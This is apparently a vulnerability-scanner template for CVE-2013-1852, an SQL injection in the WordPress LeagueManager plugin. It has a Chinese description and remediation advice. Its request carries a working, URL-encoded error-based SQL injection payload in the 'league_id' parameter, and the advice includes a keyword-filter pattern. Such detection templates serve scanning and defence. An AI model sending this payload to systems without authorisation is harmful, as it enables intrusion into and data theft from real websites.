id: CVE-2013-1852
info:
  name: WordPress LeagueManager 3.9.11 Plugin - SQLi
  author:
  - l0ne1y
  description: |-
    WordPress Plugin LeagueManager ‘league_id’参数SQL注入漏洞
    WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。LeagueManager是其中的一个用于管理和显示Sports Leagues的插件。

    WordPress LeagueManager插件3.8及之前的版本中的leaguemanager.php脚本存在SQL注入漏洞，该漏洞源于wp-admin/admin.php脚本没有正确过滤‘league_id’参数。远程攻击者可利用该漏洞执行任意SQL命令。
  severity: high
  remediation: |-
    官方修复方案：
    1、建议用户到官方获取最新补丁或者最新版本程序：http://wordpress.org/plugins/leaguemanager/changelog/

    临时修复方案：
    1、使用预编译语句，使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口，使用此接口可以非常有效的防止SQL注入攻击。
    2、对进入数据库的特殊字符（’”<>&*;等）进行转义处理，或编码转换。
    3、确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型。
    4、数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。
    5、网站每个数据层的编码统一，建议全部使用UTF-8编码，上下层编码不一致有可能导致一些过滤模型被绕过。
    6、严格限制网站用户的数据库的操作权限，给此用户提供仅仅能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。
    7、避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。
    8、过滤危险字符，例如：采用正则表达式匹配union、sleep、and、select、load_file等关键字，如果匹配到则终止运行。
requests:
- matchers:
  - type: dsl
    dsl:
    - 'status_code==200 && contains(body,"827ccb0eea8a706c4c34a16891f84e7b") '
  matchers-condition: and
  path:
  - '{{BaseURL}}/?season=1&league_id=1%27%20AND%20(SELECT%203804%20FROM(SELECT%20COUNT(*),CONCAT(0x7178766b71,md5(12345),0x7170707171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%27zZcz%27=%27zZcz&match_day=1&team_id=1'
  method: GET
